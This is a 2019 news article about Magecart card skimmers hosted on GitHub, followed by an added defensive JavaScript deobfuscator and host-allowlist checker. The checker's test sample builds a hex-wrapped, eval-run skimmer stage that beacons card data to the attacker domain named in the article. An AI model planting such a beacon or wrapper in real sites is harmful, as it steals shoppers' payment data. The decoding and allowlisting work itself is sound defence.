Security Market Segment LS
Monday, 29 April 2019 09:59

Magecart skimmers now being hosted on GitHub


Attackers have used the GitHub code-hosting service to host credit card skimmers of the kind known as Magecart, security firm Malwarebytes says, adding that new e-commerce websites are being compromised every day.

In a blog post, researcher Jérôme Segura said in most cases, the code used for skimming — written in JavaScript and obfuscated — was hosted on servers controlled by the attackers themselves.

Most of these servers used domain names mimicking Magento, the e-commerce platform most often targeted by these attacks.

Last year, British Airways was hit by a Magecart skimmer, as was online retailer Newegg.

"However, as we sometimes see in other types of compromises, threat actors can also abuse the resources of legitimate providers, such as code repository GitHub, acquired by Microsoft last year," Segura said.

The latest skimmer found by the company was a hex-encoded piece of JavaScript uploaded to GitHub on 20 April by a user with the moniker momo33333, who had opened the GitHub account that same day.

Segura posted a number of images of the obfuscated JavaScript, noting that the attacker appeared to be fine-tuning the skimmer after testing.


The deobfuscated script shows the exfiltration domain (jquerylol[.]ru) where the stolen data will be sent. Courtesy Malwarebytes

He also posted an image of the deobfuscated script, in which the domain to which the stolen data was being exfiltrated could be seen.

Segura said the compromised Magento sites would remain at risk even if the GitHub-hosted skimmer were taken down.

"Indeed, attackers can easily re-infect them in the same manner they initially injected the first one," he said.

"It is critical for e-commerce site owners to keep their CMS and its plugins up-to-date, as well as using secure authentication methods. Over the past year, we have identified thousands of sites that are hacked and posing a risk for online shoppers."

Commenting on the incident, Peter Blum, vice-president of Technology at Instart, a company that provides cloud services for application performance and security, said: "With the rapid rise of third-party JavaScript code used on websites, it's easier than ever for malicious third parties to gain access to sensitive information such as credit card numbers, address information and even login credentials.

"My advice for companies is to take a zero trust model with JavaScript on their sites, starting with a policy to block access by default to any sensitive information entered in Web forms and stored cookies.

"From there, you only allow a select set of vetted scripts (usually only your own) to access this sensitive data. And as a result, if this type of skimming code does get on your site, it simply can't access any sensitive information."
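The two practical steps the article describes, decoding a hex-encoded skimmer to find its exfiltration domain and checking that domain against a list of vetted hosts, as an added example. This is not code from the Malwarebytes post or from the skimmer it analysed. The sample payload is constructed inline (hex-encoded twice, with a "\x" escaped URL inside), the 32-hex-character threshold for treating a string literal as encoded is an assumption, and the vetted-host list is assumed; the only value taken from the article is the jquerylol[.]ru domain it names as the exfiltration host. The decoded output is for reading, not for running.

```javascript
// Added example (not the page's or the skimmer's own code): peel hex layers off a
// suspected skimmer and report any host it contacts that is not on the allowlist.

// Decode "\x6a"-style escapes in place.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode a bare hex string ("6a7175...") to text; throws on non-hex or odd-length input.
function decodePlainHex(hex) {
  const clean = hex.replace(/\s+/g, '');
  if (clean.length % 2 !== 0 || /[^0-9a-fA-F]/.test(clean)) {
    throw new Error('not a hex string');
  }
  let out = '';
  for (let i = 0; i < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.slice(i, i + 2), 16));
  }
  return out;
}

// Decode long quoted hex literals (the usual "var p='6a71...'; eval(decode(p))" shape).
// Even length and >= 32 hex chars are assumed thresholds; shorter or odd literals are left alone.
function decodeHexLiterals(src) {
  return src.replace(/(["'])((?:[0-9a-fA-F]{2}){16,})\1/g, (_, q, h) => q + decodePlainHex(h) + q);
}

// Peel layers until nothing changes; bounded so a pathological input cannot loop forever.
function deobfuscate(src, maxLayers = 5) {
  let cur = src;
  for (let i = 0; i < maxLayers; i++) {
    let next = cur;
    if (/^[0-9a-fA-F\s]+$/.test(next)) next = decodePlainHex(next); // whole file is hex
    next = decodeHexEscapes(next);
    next = decodeHexLiterals(next);
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Hostnames from any http(s) URL in the decoded source, lower-cased and de-duplicated.
function extractHosts(src) {
  const re = /https?:\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Defang for reports, the way the article prints jquerylol[.]ru.
function defang(host) {
  return host.replace(/\./g, '[.]');
}

// Hosts the script talks to that are not on the site's vetted list.
function unexpectedHosts(src, allowed) {
  const ok = new Set(allowed.map(h => h.toLowerCase()));
  return extractHosts(deobfuscate(src)).filter(h => !ok.has(h));
}

// --- constructed sample; not the skimmer from the momo33333 account ---
function encodePlainHex(text) {
  return [...text].map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}
// Inner stage: beacon the form data out. The scheme is written as \x escapes.
const INNER = "var i=new Image();i.src='\\x68\\x74\\x74\\x70\\x73://jquerylol.ru/gate.php?d='+btoa(JSON.stringify(cc));";
// Wrapper stage: carries the inner stage as a hex literal and decodes it at runtime.
const WRAPPER = "var p='" + encodePlainHex(INNER) +
  "';eval(p.replace(/../g,function(h){return String.fromCharCode(parseInt(h,16));}));";
// What would sit in the repository: the whole wrapper hex-encoded once more.
const SAMPLE_PAYLOAD = encodePlainHex(WRAPPER);
// Assumed allowlist of hosts the shop's own scripts are expected to contact.
const VETTED = ['shop.example', 'cdn.shop.example'];

console.log(unexpectedHosts(SAMPLE_PAYLOAD, VETTED).map(defang));
```

Run it with Node; the only host left after decoding, jquerylol[.]ru, is reported because it is absent from the vetted list. The same check against a page's live script tags is what turns Blum's allowlist policy into something that fires when a skimmer is injected.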




Sam Varghese


Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.
